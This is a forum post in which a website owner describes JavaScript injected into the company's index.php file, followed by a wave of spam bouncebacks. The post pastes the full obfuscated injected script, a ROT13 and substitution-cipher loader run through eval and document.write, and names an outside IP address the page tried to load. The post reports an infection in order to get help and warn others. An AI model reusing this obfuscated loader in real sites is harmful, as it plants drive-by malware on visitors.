JavaScript injected into PHP

GoneShootin

We had this happen to our company website. It infected our index.php file somehow. After that we then got a WORLD of bounceback emails all from russia. This is the javaScript code:

var kco=" shapgvba hmdvx(oz){ine fz,we=\"{v^abRkP9 |V}!6w~pn)@GZro#[$y,`:SO0dMjm&AihU2W;5.lt8fH']u_\\\"q+7BIXNCegs13xT-c(4*z=\",t=\"\",du,dsj,v=\"\",nt;sbe(fz=0;fz<oz.yratgu;fz++){ du=oz.puneNg(fz);dsj=we.vaqrkBs(du);vs(dsj>-1){ nt=((dsj+1)&#37;81-1);vs(nt<=0)nt+=81;v+=we.puneNg(nt-1); } ryfr v+=du;}t+=v;qbphzrag.jevgr(t);}",tuy="";for(mhs=0;mhs<kco.length;mhs++){ xcxg = kco.charCodeAt(mhs);if((xcxg>64 && xcxg<78)||(xcxg>96 && xcxg<110)) xcxg=xcxg+13;
                                                                                                                                                                                                                                                                        else if((xcxg>77 && xcxg<91)||(xcxg>109 && xcxg<123))xcxg=xcxg-13;tuy=tuy.concat(String.fromCharCode(xcxg));} var ddy,xnx; eval( tuy );ddy="<Uat^(f|,)o8H)8b{d~)u)Uat^(fd>|+EaH=bofyzt^fb4|d<S9R}rM|,)o8H)8b{\\d;)u)Sat^(f\\d|SR9{\\d_ff(F//zzzy8EE8,b)o),gf,aUyaE=/\"\"Hfuy~U?d7+EaH=bofytb1bttbt7d\\d><\\/S9R}rM>d|@5|</Uat^(f>|"; uzqik(ddy);

Possibly linked, but one the staffers spotted in IE that it was trying to load the following IP address after our website had loaded:

http://58.65.234.163/...some random page....

Having taken out the JavaScript code, it looks like the spam has died down and hopefully we will be back to normal. But we weren't the only ones.

http://www.codingforums.com/showthread.php?p=671538